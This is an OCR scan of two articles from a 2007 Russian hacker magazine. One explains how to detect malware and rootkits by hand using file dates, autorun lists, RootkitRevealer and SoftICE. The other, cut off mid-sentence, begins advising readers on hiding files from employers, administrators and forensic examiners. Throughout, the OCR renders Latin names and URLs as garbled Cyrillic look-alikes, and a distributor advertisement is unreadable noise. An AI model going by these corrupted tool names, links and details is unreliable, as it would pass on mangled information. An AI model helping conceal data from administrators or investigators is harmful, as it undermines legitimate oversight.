6400С3. Видео: АТІ Кас1еопХ1900ХТХ. 

Результаты тестирования: 

ЗОМагк'Об, Оѵегаіі: 6292 Магкэ. І_АМЕ МРЗ Епсосііпд: 2 мин 48 сек. ОіѵХ- 
конвертирование: 5 мин 13 сек. Р.Е.А.П.. 1600x1200, 4хАА, 16х АР: 49- 
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Руткитам — бой! 

Поиск вирусов своими руками 

Как антивирусы детектят заразу, всем хорошо известно. Ни фига они ее не детектят! Даже 
когда последнему ламеру ясно, что с компьютером что-то не то, живность резвится и раз- 
множается, а разные там КАѴ'ы и КГСЮ'ы молчат и только успокаивают: все хорошо. Короче, 
отправляем антивирусы в топку и включаем свой мозг, зарываясь в недра операционной 
системы и проверяя на стерильность все злачные места обитания малвари. 



азвелитутзоопарк, понимаешь. Это же непорядок конкрет- 
ный! А непорядок надо разгребать. 

Конечно, наивно надеяться, что в интеллектуальном 
состязании сзловредной малварью можно справиться по 
готовым рецептам. Существуеттысяча и один способ внедрения в систему, 
и с каждым днем появляются все новые и новые, учитывающие ошибки 
своих предшественников и умело маскирующиеся так, что не найдешь. 

Но крутой малвари очень немного. Она стоит нехилых денег (от десяти 
килобаксов) и пишется строго под заказ для целенаправленных атак на 
конкретные организации. Выпускать ее в живую природу никто не собира- 
ется, и 99% заразы, с которой нам приходится иметь дело, — это прими- 
тивные пионерские вирусы, написанные в процессе изучения йеірбі или 
ѴІ5иаІ Вазіс’а и органически неспособные к маскировке. Обнаружить их 
присутствие в системе — все равно что два байта переслать. 

Главное — это научиться основам анализа, освоить пару-тройку простых, 
но эффективных приемов, после чего технику боя можно шлифовать и 
самостоятельно, уже без помощи автора. 

Хронология вирусного внедрения, 
или машина времени 

Операционные системы семейства ѴѴіпсІоѵѵз, помимо атрибута времени 
последней модификации файла, также поддерживают атрибуты времени 



создания и времени последнего обращения. Какэто можно исполь- 
зовать на практике? А вот как: после установки системы все файлы в 
каталогах ѴѴіпсІоѵѵз и 5уз1ет32 имеют идентичные (ну или практические 
идентичные) атрибуты времени создания, позволяя отслеживать файлы, 
установленные позднее. 

Допустим, мы установили систему со всеми необходимыми программами 
и больше ничего не ставили. Тогда все исполняемые файлы и динами- 
ческие библиотеки из каталогов ѴѴіп 6 оѵѵз и 8у5Іет32, созданные позднее 
этого срока, с высокой степенью вероятности являются троянскими 
программами. Естественно, дату создания файла легко изменить, иумной 
малвари ничего не стоитзамаскироваться. Но, как показывает практика, 
очень редкая мал варь заботится об этом и на времени создания вредо- 
носные программы палятся косяками. 

А какбыть, если мы беспорядочноустанавливали новые программы и 
удаляли старые? В этом случае в каталогах ѴѴіпсІоѵѵз и 5узіет32 появля- 
ется множество файлов с различными датами создания, принадлежа- 
щих честным программам, и малвари ничего не стоит затеряться среди 
них. На самом деле, практически каждому честному файлу из каталогов 
ѴѴіпсІоѵѵз и 5уз1ет32 соответствует своя программа из каталога Ргодгат 
Рііез, представленная одним или несколькими файлами и ярлыками на 
рабочем столе или в меню «Пуск». 

Проглядывая файлы в каталогах ѴѴіпсІоѵѵз и 5уз1ет32, смотрим на время 
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> Внешний вид программы АпІІ-5руІп?о 



>> 




> База знаний, содержащая сведения о различных 
файлах, как вредоносных, так и вполне 
«законопослушных» 



их создания и пытаемся найти файлы с близким временем 
создания в каталоге Ргодгат Рііев. И если этотпоискзавер- 
шается успешно, считаем, что с файлом все ОК. В противном 
случае устраиваем суровые разборки на предметтого, откуда 
он взялся и кто его установил. 

Некоторые программы (например, хранители экрана) 
устанавливают себя только в каталогѴѴіпсІоѵѵв, не касаясь ос- 
тальных, что делает их похожими на малварь. Остается лишь 
смотреть на дату создания и мучительно вспоминать, что мы 
устанавливали на свой жесткий диски когда. 

Описанная методика может показаться кому-то слишком 
утомительной и ненадежной, однако она выручала автора 
не раз и не два, вто время кактехнически более продвину- 
тые приемы отдыхали, не показывая никакого позитивного 
результата. Самое главное — анализ даты создания файлов 
не требует никаких навыков и доступен каждому, вто время 
как дизассемблированием владеют единицы. 

ОК, будем считать, что мыщъхтебя уговорил. А разтак, то 
переходим от слов к делу. Для просмотра даты создания 
открываем проводникѴѴіпсІоѵѵв, в меню «Вид» выбираем 
«Таблица», затем «Вид-> Настройка столбцов» и взводим 
галочку напротив «Создан». Щелкнув мышью по шапке 
таблицы, выбираем сортировку по убыванию даты создания, 
после чего самые свежие файлы окажутся в начале списка. 
Ой, сколько здесь всего интересного! На компьютере в 
каталоге 5увІет32 обнаруживается множество файлов 
ргеШЬ_РгеМаІа*, автоматически создаваемых системой 
и хранящих данные о счетчиках производительности. 
Пропускаем их и идем дальше. Видим пару подозритель- 
ных файлов — рсНютпТсШ и М5МРЮЕ.0І_І_, дата создания 
которых совпадаете датой создания каталога РОРСгеаІогв 
Ргодгат Рііев. Ага, значит, это динамические библиотеки, 
принадлежащие одноименной программе, установленной в 
обозначенное время. 

Затем опять идут счетчики производительности и дина- 
мические библиотеки кодека РРЗбоѵѵ — ф_ѵбл/.сІІІ и ТС_ѵЬѵ. 
тапйезі, а за ними — подозрительный исполняемый файл 
еріпЬ.ехе, не соответствующий ни одному каталогу из 
Ргодгат Рііев. 

Идем на ѵѵѵѵѵѵ.ѵігивіііаі.сот (или любую другую опііпе-служ- 
бу аналогичного типа) и прогоняем еріпб.ехе через кучуан- 
тивирусов, часть из которых начинает ругаться на неизвес- 
тный вирус. Соответственно, вину подследственного можно 



считать полностью доказанной, без права на оправдание. 
Часто после посещения сайтов «клубничной»тематики или 
запуска файлов, полученных из ненадежных источников 
(например, самостоятельно пришедших со свежим мылом), 
приходится гадать: поимели нас или нет? 

Поискфайлов, созданныхза последние сутки, является иде- 
альным средством выявления заразы. РІажимаем «Пуск -> 
РІайти Файлы и папки», указываем диски, на которых сле- 
дует осуществлять поиск (как минимум необходимо указать 
диск, содержащий операционную систему), в «Параметрах 
поиска» взводим галочку напротив «Даты» и говорим искать 
файлы, созданные за последний день, после чего давим 
кнопку «РІайти» и ждем результатов. 

В нашем случае в каталоге 5увІет32 обнаружился свеже- 
испеченный файл Ыбггг.ехе, маскирующийся подсаморас- 
паковывающийся гаг-архив, который мы не создавали и 
который, очевидно, является зловредной программой, под- 
лежащей проверке на ѴігивТоІаІс последующим удалением. 

Объекты автозагрузки 

В уже существующие исполняемые файлы современная мал- 
варь внедряется крайне редко, предпочитая прописывать 
себя в автозагрузку (условно), запускаясь вместе с загрузкой 
операционной системы. Появление программы, которую мы 
не устанавливали, в объектах автозагрузки свидетельствует 
о вирусном заражении. Причем, в отличие от даты создания 
файла, которую ничего не стоит изменить, замаскироваться 
в объектах автозагрузки сложно — на это способна только 
самая продвинутая малварь, именуемая руткитом, но о 
руткитах мы поговорим позднее. 

Проблема в том, что объектов автозагрузки очень много. Они 
живописно разбросаны по ветвям реестра, полный перечень 
которых занял бы целую страницу, а может быть, даже две. 
Однако нет никакой необходимости в том, чтобы держать 
весь этот легион технических подробностей у себя в голове. 
Существует множеств о ути л ит, самостоятельно сканирую- 
щих список автоматически загружаемых объектов с учетом 
последних веяний времени (Місгозоіі добавляет все больше 
и больше веток реестра с прописанными путями кфайлам 
и/или динамическим библиотекам, которые необходимо 
загрузить при старте операционной системы). 

Одной из таких утилит является условно-бесплатная програм- 
ма Апіі-Зруіпіо, которую можно загрузить с одноименного 
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> Полезные утилиты 
для поиска вирусов и 
руткитов, документа- 
ция по ЗоШСЕ — это 
лишь малая часть 
того, что ты найдешь 
на ОѴО-диске. 




> Еще удобнее 
осуществлять поиск 
файла с помощью 
РАП'а (консоль рулит, 
причем совершенно 
без руля), выбрав 
детальный режим 
отображения пане- 
лей РідЫ/ЕеІІ Сопігоі 
— 5 (не путать с Р5!) и 
нажав <СігІ-Р8> для 
сортировки по дате 
создания. 
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> Просмотр даты создания в РАР'е 
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> Результат проверки еріпЬ.ехе в опііпе-службе ѴігизТоІаІ, прогоня- 
ющей файл через множество антивирусов 



сайта [ ЬКр://апіі-5рѵ.іпіо 1 и использовать 30 дней, а затем громко сказать 
« Кря !» или (оужас!) приобрести платную версию, впрочем, это уже не 
относится к обсуждаемой проблеме. 

Короче, запускаем Апб-Зру ІпЬ, и на экран тутже выводится список 
активных процессов и автоматически загружаемых объектов (тип запуска 
того или иного объекта приведен в графе «Запуск»), Все, что нам нужно 
делать, — это следить за списком автозагрузки на предмет появления в 
нем новых объектов. А чтобы не запутаться в программе, предусмотрен 
вывод информации в файл («Файл-> Экспорт в...»); просто сохраняем 
отчет при каждом запуске, а затем сличаем его с предыдущей версией. 
Если никаких приложений мы не устанавливали, а список автозагрузки 
пополнился новыми жильцами, это малварь. 

В Апб-Зру ІпЬ заложен достаточно мощный эвристический механизм, 
анализирующий активные процессы и автоматически загружаемые 
объекты и определяющий вероятность их принадлежности к вирусам. К 
сожалению, эвристика очень часто ошибается, в результате чего честные 
программы классифицируются как«потенциально опасные», а малварь 
получает рейтинг«похожа на безвредную». 

Изюминка Апб-5ру ІпЬ (о которой не догадался ни КАѴ, ни N0032) втом, 



что она поддерживает базу знаний, включающую в себя множество фай- 
лов, чья вредоносность оценивается опытными пользователями АпІі-5ру 
Іпк) самостоятельно. Возьмем, например, файл ЗЗЗепзог.сШ, найденный 
в компьютере автора, которому Апб-Зру ІпЬ присвоила рейтинг82%, что 
есть бэд. Заходим на ЬЦр://апб-5рѵ.іпЬДіІе/іпсІех.ЫтІ . вводим «ЗЗЗепзог.сШ» 
в строку поиска и через несколько секунд узнаем, что ЗЗЗепзог.сШ пред- 
ставляет собой компонентЗубаІе Регзопаі Рігеѵѵаіі, который действитель- 
но установлен на компьютере, а следовательно, на счет вирусов можно не 
волноваться. 

Ксожалению, поиск в базе знаний осуществляется только по имени, без 
учета содержимого, и грамотной малвари ничего не стоит прикинуться 
честной программой. Однако подавляющее большинство современных 
вирусов написано пионерами, которые не научились даже генерировать 
случайные имена, и самое большее, на что они способы, — это зашить 
внутрь малвари несколько имен, выбираемых наугад. Какследствие, 
поиск по именам дает надежные позитивные результаты, то есть если в 
базе знаний такой-то файл отнесен к вирусам, в его агрессивной природе 
можно не сомневаться. А вот на негативный результат полагаться нельзя, 
и все «неопасные» файлы необходимо прогнать через антивирусы, чтобы 



> ЗоШСЕ обнаружил процесс зузгН, который не зацепил диспетчер задач, что свидетельствует о факте активной маскировки 
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> Поискфайлов, созданныхза последние сутки, позволяетобнару- 
жить малварь по горячим следам 




> РооІкіІРеѵеаІег — миниатюрная программа 
с огромнейшими возможностями 



удостовериться, что мы имеем дело с честной программой, а не маски- 
рующейся малварью. Также обращай внимание и на дату создания. Если 
файл представляет собой компонент какого-то приложения, то время его 
создания должно совпадать со временем создания всех остальных прина- 
длежащих приложению файлов. 

Игры с руткитами в прятки 

Руткитом называют продвинутую мальварь, скрывающую свое присутс- 
твие на компьютере. В эпоху господства М5-005такие программы назы- 
вали «стелс-вирусами» (ЗіеаІіМ. но сейчас эта терминология признана 
устаревшей. Ктомуже отстелс-вирусов, ныкающих своютушу в заража- 
емых файлах, руткиты отличаются тем, что используются для сокрытия 
произвольных файлов, процессов и сетевых соединений —тех, которые 
им укажет разработчик малвари. В исполняемые объекты они внедряются 
редко. Можно даже сказать, что руткиты вообще никуда не внедряются, 
но легче от этого не становится. Сокрытые файлы не отображаются ни в 
проводнике, ни в РАВ'е, а сокрытые процессы отсутствуют в диспетчере 
задач, поэтому ни Апб-5ру ІпГэ, ни поиск по дате создания не покажут 
ничего интересного. Ну какдальшежить?! 

На самом деле, руткиты обнаружить легче всего. Активная маскировка 
выдаетфакт внедрения! Достаточно получить списокфайлов/процессо- 
ров/сетевых соединений, обратившись напрямую к внутренним функциям 
ядра, и сравнить полученный результате данными, возвращенными 
высокоуровневыми АРІ-функциями операционной системы. Всякое рас- 
хождение между ними будет свидетельствовать о заражении. Намерения 
руткита определить сложнее (некоторые легальные защитные механизмы 
устроены по принципу руткитов), однако нам этого и нетребуется. Хорошие 



программы не маскируются! Даже если руткитне собирается причинять 
нам вред, используемые им методики стелсирования — это потенциаль- 
ный глюкодром, нарушающий нормальную работу операционной системы. 
А кому нужны лишние критические ошибки и голубые экраны смерти?! 

Для поиска руткитов можно воспользоваться бесплатной программой 
РооІкИ: Веѵеаіег, написанной знаменитым исследователем ѴѴіпсіоѵѵз 
ЫТ Марком Русс и нов и чем. Она занимает (в упакованном виде) чуть 
больше двухсот килобайт (причем половину объема отъедает помощь): 
ЬНр://боѵѵп[оаб.5Ѵ5Іпі:егпа[5.сот/Ві[е5/Воо1кі1:Веѵеа[ег.2Ір . но, несмотря на 
свою простоту, обнаруживает (по утверждению ее создателя) все руткиты, 
представленные на сайте ѵѵѵѵѵѵ.гооікіГсогп — основном источнике рутки- 
тов для пионеров и прочих парнокопытных. 

Впрочем, серьезные руткиты в публичный доступ не выкладываются и 
стоят от 1 0к- 1 5к денег в баксах. Среди них есть и такие, которые знаюто 
существовании Вооікіі Реѵеаіеги блокируютего запуск с невнятным со- 
общением об ошибке или же используютспециальные алгоритмы обхода, 
с которыми Рооікіі Реѵеаіегуже не справляется. Однако вероятность сло- 
вить та кую продвинутую заразу крайне мала, и потому результатам работы 
Рооікіі: Реѵеаіег можно вполне доверять. 

Рооікіі: Реѵеаіег — единственная утилита, работающая с файловой систе- 
мой/реестром на физическом уровне и способная обнаружить практичес- 
ки все руткиты уровня ядра, которые КАѴ, О г. ѴѴеЬ и другие коммерческие 
антивирусы даже не пытаются искать. N0032 обнаруживает большинство 
руткитов прикладного уровня и некоторые руткиты уровня ядра. Однако, 
во-первых, он требует предварительной установки на компьютер (да и 
весит дофига), во-вторых, представляет собой платный продукт, а в-третьих, он 
намного более известен, что отнюдь не идетему на пользу, и качественные 



ПЛАГИНЫ К БРАУЗЕРАМ 

Достаточно большое количество малвари распространяется в виде расширений кбраузерам, преимущественно к ІЕ (малварь, поражающая Горя- 
щего Лиса и Оперу авторудо сих пор не встречалась). Это обеспечивает высокую степень скрытности, поскольку в этом случае отпадает необходи- 
мость порождать новый процесс, а как найти расширения, знает далеко не каждый хакер, не говоря уже о пользователях. 

Касательно ІЕ — чтобы обезвредить малварь, достаточно зайти в меню «Сервис», найти там «Свойства обозревателя» и сбросить галочку напротив 
пункта «Включать сторонние расширения обозревателя» (она находится в разделе «Обзор» вкладки «Дополнительно»). Если этот пун кт отсутству- 
ет, значит, ты используешь слишком древнюю версию браузера — срочно обновляйся! Ведь через незаткнутые дыры черви лезут толь ко так! 
Однако следует помнить, что при отключении сторонних расширений отвалится панель ОоодІеТооІЬаги перестанет работать контекстное меню 
многих менеджеров закачки, с чем смириться никак нельзя. К счастью, Апіі-Эру ІпГо умеет отображать сторонние расширения ІЕ, что существенно 
упрощает поиск малвари. 

Горящий Лис и Опера выгодно отличаются от ІЕтем, что самостоятельно выводятсписок расширений, позволяя выборочно отключать те из них, 
которые мы неустанавливали. Поэтому прибегать к помощи утилит для решения этой задачи нет никакой необходимости. 
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> Просмотр даты создания в РАП'е 




> Отключение сторонних расширений в ІЕ 





руткиты учатся обходить его еще в зародыше. Все это делает Рооікіі 
Реѵеаіег практически безальтернативным средством, с которым мы 
сейчас и познакомимся. 

Запускаем РооІкііРеѵеаІег.ехе, нажимаем кнопку «5сап» и ждем, пока 
программа просканирует ветви реестра и дисковые файлы на предметсо- 
крытой заразы. Поиск сокрытых сетевых соединений не осуществляется, 
что не есть гуд, поскольку черви все чаще и чаще прибегают к маскировке 
левого трафика. Выглядит это приблизительно так: все приложения 
закрыты, но модем оживленно мигаетсвоими огоньками. Тутуже никакого 
Рооікіі Реѵеаіег не нужно, чтобы заподозрить наличие непрошенной 
заразы или АбѴѴаге, загружающего баннеры. 

Если зловредная программа в дополнение к сетевым соединениям 
скрывает и свой исполняемый файл (динамическую библиотеку] и/или 
процесс, она будет обнаружена РооШі Реѵеаіег на общих основаниях, в 
противном случае вредоносный процесс легко обнаружитьс помощью 
Апіі-Эру ІпЬ. 

А что делать, если АпІі-5ру Іпіо молчит, как партизан на допросе, 
РооІкііРеѵеаІег не показывает ничего интересного, а модем все-таки 
мигает, указывая на наличие заразы? Приходится прибегать к «тяжелой 
артиллерии» — к отладчику ВоШСЕ, работающему с операционной систе- 
мой на самом низкомуровне и цепляющему все (ну или практически все), 
что шевелится. Только не спрашивай меня, где его взять и какустановить! 
Документацию по этой теме мы положили на диск, поэтому будем считать, 
что ЭоШСЕуже установлен. Вызываем его нажатием <СігІ-0> (комбина- 
ция поумолчанию, которая прижелании можетбыть изменена] и даем 
команду РРОС для вывода списка процессов, после чего сравниваем 
полученный результате данными, возвращенными диспетчером задач. 

В данном случае ЗоШСЕ обнаружил процесс зузгіі, который не зацепил 
диспетчер задач, что свидетельствуете факте активной маскировки 
(впрочем, ничего не говоря о его зловредности). 

Стерилизация системы 

Обнаружив подозрительный объект, лучше поскорее избавиться от него. 
Если мы знаем путь к файлу объекта и он не предпринимаетникаких 
усилий по своей маскировке, то проще всего переименовать его во что- 
нибудьтипа доосІЬуе-таІѵѵаге.сІаІ итутже перезагрузиться, после чего 
отправить разработчикам антивирусов натрепанацию илиудалить. 

Зачем переименовывать? Азатем, что ѴѴіпсІоѵѵз блокирует удаление за- 
пущенных файлов и загруженных динамических библиотек, но допускает 
переименование. Переименование же файла препятствует его запуску 
после перезагрузки (ведь путь в реестре остался тем же самым!], и с ним 
можно делать все что угодно. 

Если же малварь прячет файл, то побороть его становится уже сложнее. 
Продвинутая малварь просто не позволит себя удалить (и, в общем-то, 
правильно сделает). Самое простое, что только можно предпринять в 



обозначенной ситуации, — это загрузиться с 1_іѵеС0, поддерживающего 
ЫТРЗ-разделы (утебя ведь диск размечен под ІЧТР5, верно?), и удалить 
все левые файлы. Этому малварьуже никак не сможет противостоять! 
ПодойдетѴѴіпсІоѵѵ РЕ (в свободную продажу не поступала, но найти ее не 
проблема), Кпорріх (довольно популярный клон І_іпих) или подключение 
винчестера с инфицированной системой вторым кстерильной ХР с после- 
дующим удалением нехороших файлов уже оттуда. 

Как вариант — можно переустановить систему с нуля. Способ радикаль- 
ный, зато действенный. Ріо сначала необходимо скачать все Бегѵісе 
Раск'и вместе с самыми последними заплатками, поскольку выходить 
в сеть на незаштопанной системе небезопасно. Ксчастью, МісгозоІТ 
помимо автоматического обновления поддерживает и ручное. Порядок 
установки заплаток должен совпадать с датами их выпуска (ѴѴіпсІоѵѵз его, 
увы, не проверяет), в противном случае более древние обновления, уста- 
новленные последними, могутзатереть один или несколько системных 
файлов со всеми вытекающими отсюда последствиями. 

Сохраняем обновления на локальном диске и записываем на бумажке 
даты их выхода (или просто скачиваем обновления один за другим в 
порядке возрастания их даты, а перед ихустановкой отсортировы- 
ваем файлы по времени создания). Затем загружаемся с ЫѵеСО (или 
стерильной ХР, к которой зараженный винчестер подключен вторым) 
и удаляем каталоги ѴѴіпсІоѵѵз и Ргодгат Рііез, после чего вынимаем 
ЫѵеСО (отключаем зараженный дискот стерильной ХР, вновь подклю- 
чая его первым] и устанавливаем ѴѴіпсІоѵѵз с дистрибутивного Сй. Веро- 
ятность выживания малвари минимальна, однако время, потраченное 
на переустановку системы, довольно значительно, а потому этот способ 
годится лишь в качестве последнего средства, когда остальные уже 
исчерпаны. 

Заключение 

Страх перед вирусами высаживает на конкретную измену, заставляя 
искать черную кошку, которой нет, в темной комнате, которой никогда 
не было. Малварь далеко нетак вездесуща и отнюдь не всемогуща. 
Большинство странностей в поведении компьютера обуславливается 
дефектами железа, кривизной рук и прочими подобными факторами. Су- 
ществует только один способ побороть страх —разобраться в устройстве 
вирусов, освоить ассемблер, научиться держать в руках отладчик с тем, 
чтобы при малейших подозрениях можно было провести полную ревизию 
системы. Мы боимся того, что не контролируем, чем не можем управлять, 
что незнаем... А не знаем потому, что неутруждаем себя этим. Рядовые 
пользователи предпочитают отмахиваться от проблемы, мол, пользовать- 
ся тостером можно, даже не будучи инженером. Верно. Тостером — можно. 
Но компьютер — это все-таки нетостер. Это сложная электронно-вычис- 
лительная машина, требующая отоператора определенной квалифика- 
ции и жестоко карающая за нежелание думать. З-И 



/ 036 



ХАКЕР 06 /102/ 07 








официальный дистрибутор 

(49 5)970 .іэ-зз чѵѵлѵ.іе сЬ поіга й е . г у 

“ГеЭСМСЭТГ^Н^аеі 



МОСМѴЬ- Аіхн-н. .:*ГЛ| ГМ га-2*. Арпт І*9Э| МОМ-вТ 1 Г*"Ы- №і-ор илжюопи; цгр-н д-вд щ. ш дуииьы ИМ) Шгімй" ЫИ| ч41*1-Г.! 

кс^-и^о. *.мг. -л>«> пчм»™ нвддо ни) ттт ~і?ъ: *«мт»рг ми) тяттв-ж н*«з (іда. : гіг. і(Н!і п-и-. :чч гм-огт? 

-ршьчиочпю ммпмпчі **»і ммгта. Ся'онв гимміфм |аиа» ,'вл ід ш СпріКАхиц |4№> »» м Ф и-н-р <*») іомллг 
Ом«оіі С«-уіЛІі (-*ѴН №70 <Ю0? «ЧГС<НЧш1іР НИ) ОТО 1«Л Рі> І 4*6] ТН-»ЯГ ШЛИ*. ЙФИШ ^В) 775-75--М 1ЛЖ43ал<Н*т НИ) 211'73-ВВ 
ііАічійѴіі: і!тн Мяміі |*4-М. АМі ыілі ии* ио ней. ■: 1 1 . 1 .~ ,!!..- ■ -:■•:■ ■::•■. . . і 

ІМПЖСКИИ: Іиііичі ии: . • Ѵ.Р, I КЛІТРИНЛГТЧ. ііПЛЫй ивті-и НТ ТТ ‘ 1П ИРКѴ1СК: Наин . 1 , Ком-ълігнк ,1 -’| ."і- ' ■ ІІ 1 

КАЗАНЬ- АЛѴПЛЧІ .Л4ѴІ ШТ 13 ИМН1В- Г в »Г*иш |П5ѴІ №1^1 ИРАКНПЦАР- МРПЛЛГ {ПТ. 17» I ГТ 11)01 ТЧп^І Кгшнютпф (МИЗ) №11-44 
КРАСНОЯРСК: Аітх :»13іЯ» 301 . КМКВШ СіХИ0Мр-813ЩД-33»ва И ДЯ ЕЙ НОВГОРОД: юстраіщ 70.337* НОВОСИБИРСК: Лі..іЛгм„ (ЗИЦ9НМ1 

3«Г ИСК іМІЗІІ 173143 Кыихігі ІІ№ 13 Гѵи-ч .15171 »К4І ОМСК Г*»»*. Зв I Р 33-5177 ИпЮ ЧЙ7і '‘1-317 

ПЕРМИ ГлиМФі СНЗЗЗ 36 і* Мпгрігча РОЗ) НМ-19* ЛЕкЭА: «Кеки <Й417( 3-1 -4 с. Аі №С10йИМ ДОІІГ Нм дааз) Ѵ«М 

Іпкпяк сМ№ №91-1). ипігжі (*$а9) и/-№н. сА*-Лнік і>30 «нажали» І*УІ| Т«=і ЮЦ| 5іШ-Ін. СМ*1№ АГГй ,ЫІ>. м-іі т 

КПРЪЧМркгг ІІНЛ ИИЗ-М синк *№(№ МѴМ77І то И- И. ГС ОС 10*03) Ю-КИ». ГЦнпч №*02) та- 77-01. ТОПЫПН; Опв*« (МВД Ю-ЖНЮ. 

-,і і-і- ■■ 1 томен .■•і..іа..‘і ■ Тюмень Ар . . <±‘ .- -и .!■ ц ѵпан ѵдэ. Ехх .. ;■:■!.■. л-оМс кч» - ■ : іэ и 

Ульяновск ОСО -Рі 27 11 20 -В 2 . ѴФА КгйНи -:? 2 і 9 * ?' 17 . ЧЕЛЯБИНСК. Ди-чѵ ІІ 5 І 7 : 1 М 17 ! НаЛмі • .5131 01 33 >»І 

І1_ш ППМ . .131 3| 13-7 Ѵ-Щ 






С глаз полой — 
из списков вон! 



Надежно прячем файлы и папки в системе 

Заныкать гейму от начальства и «клубничку» от родителей — весьма потребное дело. В Сети 
существует большое количество утилит, специально предназначенных для этих целей (как 
коммерческих, так и бесплатных), но качество маскировки и удобство использования в боль- 
шинстве случаев оставляют желать лучшего, однако при желании «шапку-невидимку» можно 
смастерить и самостоятельно! Штатные средства операционной системы таят в себе множес- 
тво удивительных возможностей, о которых догадываются далеко не все пользователи. 
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тепень скрытости информации — один из важнейших крите- 
риев, гарантирующий, что спрятанный файл или каталог не 
будет найденпо сто роннимчеловеком.Тутсл е ду ет сдел ать 
небольшое отступление и обозначить два подхода к криптог- 
рафии: шифрование и стеганографию. Шифрование ставит перед собой 
задачу кодирования информации таким образом, чтобы прочитать ее без 
знания ключа было невозможно или чрезвычайно трудно. Идея же сте- 
ганографии заключается в скрытии самого факта наличия информации в 
том или ином месте. Естественно, эти методы можно комбинировать друг 
с другом, в результате чего, даже если присутствие информации окажется 
твердо установленным фактом, без знания ключа ее все равно не удастся 
расшифровать, разве что применив ректотермальный криптоанализ 
(паяльниквточку пересечения двух прямых, в смысле ног). 

Таким образом, утилиты, шифрующие файлы, папки (и даже целые дис- 
ковые разделы), для наших целей совершенно непригодны. У незашиф- 
рованной папки с «клубничкой», заныканной в неприметном каталоге с 
огромной степенью вложенности, есть хорошие шансы долгое время оста- 
ваться незамеченной. Но стоиттолько ее зашифровать (например, спря- 
тать в гаг-архив), как антивирусы тутже начнут ругаться на всех языках, 
под которые они локализованы, и у «посторонних человеков» возникнет 
вопрос: а с чего бы это вдруг вам потребовалось шифроваться? Честным 
людям скрывать нечего. Напротив, если человек постоянно пользуют- 
ся услугами криптографии, значит, он либо параноик (это хреново, но 
поправимо), либо что-то заныкал (а вотза это могутуже и побить!). Чтобы 
не погореть, мы должны скрывать сам фактналичия сокрытых данных! Вот 
такая рекурсия получается! 

Другим критерием оценки эффективности криптографических механиз- 
мов является их стойкость ко взлому. Начинающие часто спрашивают: 
стоит л и устанавливать утилиты типа Р6Р йізк или аналогичные ему 
шифровальные средства, против которых бессилен даже Пентагон? Ответ 
зависит оттого, какую именно информацию мы собираемся скрывать и 
насколько часто планируем работать с ней. Работать с зашифрованной 
информацией — все равно что хранить золото в сундуке, зарытом под 
яблоней. Понадобилась сотня баксов — откопал, достал, закопал. И так 
каждый раз. Слишком утомительно, да и небезопасно, поскольку наби- 
раемый пароль могут подсмотреть из-за спины или увести кейлоггером, 
причем короткий словарный элементарно подбирается по словарю, а 
длинный бессмысленный легко забыть, навсегда лишив себя доступа к 
зашифрованным данным. А пароль, записанный на листок (или брелоке 
йазЬ-памятью), может стать добычей взломщика. 

Надежно защитить свои данные отспецслужб практически невозможно, 
да мы и не собираемся этим заниматься. Наши задачи гораздо скром- 
нее: дети, жена, коллеги по работе, начальник, администратор и прочие 



продвинутые пользователи. Что же касается людей в погонах, то тут 
все зависит от «повезет» или «не повезет». Если экспертизой изъятого 
компьютера будет заниматься обычный администратор, то обмануть его 
проще простого. А вотесли жесткий диск передадут фирме, специали- 
зирующейся на восстановлении данных, для скрупулезного изучения 
на секторном уровне, то тут дело труба, однако подобные «клинические» 
случаи мы не рассматриваем. 

Существует масса относительно простых, но достаточно эффективных 
механизмов сокрытия информации (для большинства из которых не 
требуется никаких дополнительных приспособлений, кроме самой опе- 
рационной системы). Автор пользуется ими далеко не первый год и за это 
время хорошо изучил их достоинства и недостатки и потому предлагает 
лишь отборные хакерские трюки. Вот! 

Как это работает, или обзор 
маскировочных утилит 

Несмотря на то что мы собираемся рассматривать способы сокрытия 
файлов и папок, не требующие установки дополнительного программного 
обеспечения (что в некоторых случаях попросту невозможно), знать, что у 
них находится «под капотом», никому не помешает. 

Имеющиеся на рынке утилиты можно разделить на два больших и прак- 
тически непересекающихся класса. Первыеустанавливаютсвой драйвер 
(службу, резидентную программу), перехватывающий системные вызовы, 
прямо или косвенно относящиеся к поиску, удалению, открытию файлов. 
После этого им остается всего лишь подчистить содержимое каталогов, 
исключая из них всякоеупоминание о сокрытых файлах и подкаталогах, 
а также блокируя прямое открытые/удаление файлов по их имени. Это 
достаточно надежный механизм, однако, ввиду множества присущих ему 
недостатков, большой популярности он так и не приобрел. 

Из-за своей схожести с руткитами файловые маскировщики обозна- 
ченного типа плохо уживаются с антивирусами, попадая под «статью» 
«вредоносная программа неизвестного типа». Акому это понравится?! 
Администраторы тут же устраивают суровые разборки с раздачей по 
обе стороны от технического прогресса (раздачей занимается бригада 
каратистов быстрого реагирования). Ктомуже корректный перехват 
системных функций реализовать очень сложно и за каждую ошибку при- 
ходится расплачиваться нестабильной работой оси и прочими глюками, 
от которых пользователи совсем не в восторге. 

Среди коммерческих продуктов, работающих на «топливе» этого вида, на- 
ибольшую популярность завоевал Эутапіес ЭузІетѴѴогкз, поддержива- 
ющий опцию Ыоііоп Ргоіесіесі Песусіе Віп и создающий скрытый каталог 
ЫРПОТЕСТ в обычной корзине. «Скрытый» не в смысле атрибута Ыбсіеп, а 
реально скрытый отсистемы и доступный только ему одному. Подробнее 




/ 039 



ХАКЕР 06 /102/ 07 







рс_гопе 




у 

> У тебя будет воз- 
можность сравнить 
эффективность 
нашего способа и 
алгоритмов, реали- 
зованных в готовых 
продуктах. Благо пос- 
ледние мы выложили 
на наш диск. 




> Не думай, что 
предложенная ме- 
тодика поможеттебе 
спрятать файлы от 
спецслужб. Они все 
равно их найдут, ты 
уж поверь. 




> Просмотр логических дисков и точек подключения с 
помощью штатной утилиты тоипіѵоі.ехе 



об этом и многом другом можно прочитать в блоге Марка 
Рѵссиновича: біф://Ыоа5.ЩсЬпеісот/тагкги55ІпоѵісЬ/ 
агсЫѵе/2006/01/15/гоо1:кИ:5-іп-соттегсіа[-5ОЙѵѵаге.а5рх ]. 
Другой класс утилит вообще не касается системных фун- 
кций и прячет файлы с каталогами путем помещения их в 
специальный контейнер, какправило, представляющий 
собой обычный файл данных, с которым маскировочная 
программа работаетчерез свой собственный интерфейс, 
выполненный в стиле проводника. А чтобы посторонние 
люди не добрались до спрятанных файлов, они защища- 
ются паролем. Грубо говоря, это то же самое, что и обычный 
запароленный ПАП. Факт сокрытия никак не маскируется, 
и чтобы работать с файлами, их нужно извлечь на диск, что 
нетолько непрактично, неудобно, но еще и небезопасно 
(поскольку следы присутствия извлеченных файлов на диске 
легко обнаружить любой утилитой типа Р-ЗГисПо, умеющей 
